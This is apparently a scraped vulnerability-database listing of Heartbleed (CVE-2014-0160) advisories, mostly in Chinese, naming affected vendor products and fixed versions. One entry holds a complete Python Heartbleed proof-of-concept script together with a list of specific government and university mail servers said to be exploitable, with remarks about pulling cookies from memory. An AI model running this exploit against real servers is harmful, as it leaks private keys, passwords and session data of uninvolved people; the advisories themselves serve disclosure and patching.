    descriptionCVE ID:CVE-2014-0160 SAP Sybase SQL Anywhere是一套全面的解决方案,它提供了数据管理、同步和数据交换技术,可快速在远程和移动环境中开发并配置数据库驱动的应用程序。 SAP Sybase SQL Anywhere所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 SAP Sybase SQL Anywhere 12.x SAP Sybase SQL Anywhere 16.x SAP Sybase SQL Anywhere 12.01 ebf 4099或16.0 ebf 1881版本已修复该漏洞,建议用户下载使用: http://www.sap.com
    idSSV:62244
    last seen2017-11-19
    modified2014-04-21
    published2014-04-21
    reporterRoot
    titleSAP Sybase SQL Anywhere OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:86038
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-86038
    titleOpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 Splunk是机器数据的引擎。使用Splunk可收集、索引和利用所有应用程序、服务器和设备(物理、虚拟和云中)生成的快速移动型计算机数据。 Splunk所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用 0 Splunk 6.x Splunk 6.0.3版本已修复该漏洞,建议用户下载使用: http://www.splunk.com
    idSSV:62198
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleSplunk OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 OpenSSL是一种开放源码的SSL实现,用来实现网络通信的高强度加密,现在被广泛地用于各种网络应用程序中。 由于处理TLS heartbeat扩展时的边界错误,攻击者可以利用漏洞披露连接的客户端或服务器的存储器内容。 0 OpenSSL 1.0.2-beta OpenSSL 1.0.1 OpenSSL 1.0.1g版本以修复此漏洞,建议用户升级使用: http://www.openssl.org/
    idSSV:62086
    last seen2017-11-19
    modified2014-04-08
    published2014-04-08
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-62086
    titleOpenSSL TLS Hearbeat信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:86019
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterlele
    sourcehttps://www.seebug.org/vuldb/ssvid-86019
    titleOpenSSL TLS Heartbeat Extension - Memory Disclosure
  • bulletinFamilyexploit
    description### 简要描述: 打包了一堆网站,内存里有cookies :D ### 详细说明: eYouMail 5 inurl:edu 搜素出来就能有漏洞的机率90%左右 前三页成功的结果 ``` mail.jn.gov.cn mail.hpu.edu.cn mail.just.edu.cn mail.hnust.edu.cn mail.tjut.edu.cn mail.shupl.edu.cn mail.haust.edu.cn mail.dufe.edu.cn mail.jliae.edu.cn mail.hist.edu.cn dn1s.cmc.edu.cn mail.hbpu.edu.cn mail.dzu.edu.cn ``` POC送上 自己测试 ``` #!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) #print pay if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return False def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s) if __name__ == '__main__': main() ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg) [<img src="https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg) 内存里有cookies [<img src="https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg)
    idSSV:95013
    last seen2017-11-19
    modified2014-04-11
    published2014-04-11
    reporterRoot
    title亿邮某版本OPENSSL heartbleed 通杀
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 Kerio Control是一款防火墙系统。 Kerio Control所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Kerio Control 8.x Kerio Control 8.2.2 patch2已经修复该漏洞,建议用户下载使用: http://www.kerio.com
    idSSV:62189
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleKerio Control OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 Barracuda多个产品存在安全漏洞。 Barracuda所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Barracuda CudaTel Communication Server 2.x Barracuda CudaTel Communication Server 3.x Barracuda Firewall 6.x Barracuda Link Balancer 2.x Barracuda Load Balancer Barracuda Load Balancer 4.x Barracuda Load Balancer ADC 5.x Barracuda Message Archiver Barracuda Message Archiver 3.x Barracuda Web Application Firewall 7.x Barracuda Web Filter Barracuda Web Filter 7.x 目前厂商已经发布了升级补丁以修复漏洞,请下载使用: https://www.barracuda.com/blogs/pmblog?bid=2279
    idSSV:62181
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleBarracuda多个产品OpenSSL TLS/DTLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 Oracle Session Monitor Suite是一款Oracle公司推出的会话监视套件。 Oracle Session Monitor Suite所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Oracle Session Monitor Suite 3.x Oracle Session Monitor Suite 3.3.40.2.1版本已修复该漏洞,建议用户下载使用: http://www.oracle.com
    idSSV:62240
    last seen2017-11-19
    modified2014-04-21
    published2014-04-21
    reporterRoot
    titleOracle Session Monitor Suite OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionOpenSSL is an open-source SSL implementation, used to implement the network communication of high-strength encryption, it is now widely used in various network applications. OpenSSL 0.9.8 za, 1.0.0 m, 1.0.1 h prior version, does not properly handle ChangeCipherSpec messages, which allows the middle attack in certain OpenSSL-to-OpenSSL communications within the use of a zero-length master key, and then use a specially crafted TLS handshake to hijack a session and gain sensitive information. OpenSSL TLS heartbeat read remote information disclosure Vulnerability (CVE-2014-0160) http://www.linuxidc.com/Linux/2014-04/99741.htm OpenSSL serious bug allows an attacker to read 64k of memory, and Debian half an hour to fix http://www.linuxidc.com/Linux/2014-04/99737.htm OpenSSL “heartbleed” security vulnerability http://www.linuxidc.com/Linux/2014-04/99706.htm By OpenSSL to provide FTP+SSL/TLS authentication functions, and to achieve secure data transmission http://www.linuxidc.com/Linux/2013-05/84986.htm * Source: KIKUCHI Masashi
    idSSV:92577
    last seen2017-11-19
    modified2016-12-20
    published2016-12-20
    reporterRoot
    titleOpenSSL SSL/TLS MITM Vulnerability (CVE-2014-0224)
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 LibreOffice是一套可与其他主要办公室软体相容的套件,可在各种平台上执行。 LibreOffice所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 LibreOffice 4.x LibreOffice 4.2.3版本已修复该漏洞,建议用户下载使用: http://www.libreoffice.org/
    idSSV:62190
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleLibreOffice OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 VMware多个产品存在安全漏洞。 VMware多个产品所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Nicira Network Virtualization Platform (NVP) 3.x VMware ESXi 5.x VMware NSX 4.x VMware NSX 6.x VMware Fusion 6.x Vmware Horizon Mirage 4.x VMware Horizon View 5.x VMware Horizon View Client 2.x VMware Horizon Workspace 1.x VMware OVF Tool 3.x VMware vCenter Server 5.x VMware vCloud Networking and Security (vCNS) 5.x 目前没有详细解决方案: http://www.vmware.com
    idSSV:62199
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleVMware多个产品OpenSSL TLS/DTLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 F-Secure E-mail/Server Security/F-Secure Server Security产品存在安全漏洞。 F-Secure E-mail/Server Security/F-Secure Server Security所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 F-Secure E-mail and Server Security 10.x F-Secure E-mail and Server Security 11.x F-Secure Server Security 10.x F-Secure Server Security 11.x 目前厂商已经发布了升级补丁以修复漏洞,请下载使用: http://www.f-secure.com/en/web/labs_global/fsc-2014-1
    idSSV:62185
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleF-Secure E-mail/Server Security OpenSSL TLS/DTLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 Attachmate Reflection是一款优秀的Unix终端仿真软件。 Attachmate Reflection所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Attachmate Reflection 14.x 目前没有详细解决方案: http://www.attachmate.com/
    idSSV:62180
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleAttachmate Reflection OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 WatchGuard Fireware XTM是一款防火墙设备。 WatchGuard Fireware XTM所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 WatchGuard Fireware XTM 11.x WatchGuard Fireware XTM 11.8.3 Update 1版本已修复该漏洞,建议用户下载使用: http://watchguardsecuritycenter.com
    idSSV:62245
    last seen2018-07-03
    modified2014-04-21
    published2014-04-21
    reporterKnownsec
    titleWatchguard Fireware XTM OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 Sophos Antivirus是一款防病毒应用程序。 Sophos Antivirus for vShield所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Sophos Antivirus for vShield 1.0 Sophos Antivirus for vShield 1.1 目前没有详细解决方案: http://www.sophos.com
    idSSV:62197
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleSophos Antivirus for vShield OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 HP多个产品存在安全漏洞。 HP多个产品所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 HP Onboard Administrator 4.x HP AssetManager 9.x HP Diagnostics 9.x HP IT Executive Scorecard 9.x HP LoadRunner 11.x HP LoadRunner 12.x HP OpenView Connect-It (CIT) 9.x HP Performance Center 11.x HP Performance Center 12.x HP Server Automation 10.x HP Service Manager 9.x HP Smart Update Manager (HP SUM) 6.x HP System Management Homepage 7.x HP UCMDB Browser 1.x HP UCMDB Browser 2.x HP UCMDB Browser 3.x HP Universal Discovery Universal CMDB Configuration Manager 10.x HP Universal Discovery Universal CMDB Configuration Manager 9.x 目前没有详细解决方案: http://www.hp.com
    idSSV:62186
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleHP多个产品OpenSSL TLS/DTLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 OpenVPN是一款开源VPN实现。 OpenVPN所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 OpenVPN 2.x OpenVPN 2.3.3-I002版本已修复该漏洞,建议用户下载使用: https://openvpn.net/
    idSSV:62239
    last seen2017-11-19
    modified2014-04-21
    published2014-04-21
    reporterRoot
    titleOpenVPN OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 BlackBerry Link是黑莓设备的同步软件。 BlackBerry Link所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 BlackBerry Link 1.x 目前没有详细解决方案: http://www.blackberry.com
    idSSV:62182
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleBlackBerry Link OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 PostgreSQL是一款对象关系型数据库管理系统,支持扩展的SQL标准子集。 PostgreSQL所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 PostgreSQL 8.x PostgreSQL 9.x PostgreSQL 9.3.4-3, 9.2.8-3, 9.1.13-3, 9.0.17-3和8.4.21-3版本已经修复该漏洞,建议用户下载使用: http://www.enterprisedb.com
    idSSV:62241
    last seen2017-11-19
    modified2014-04-21
    published2014-04-21
    reporterRoot
    titlePostgreSQL OpenSSL TLS心跳信息泄漏漏洞

The Hacker News

Vulner Lab

idVULNERLAB:1254
last seen2019-05-29
modified2014-04-09
published2014-04-09
reporterVulnerability Laboratory [Research Team]
sourcehttp://www.vulnerability-lab.com/get_content.php?id=1254
titleHeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu

References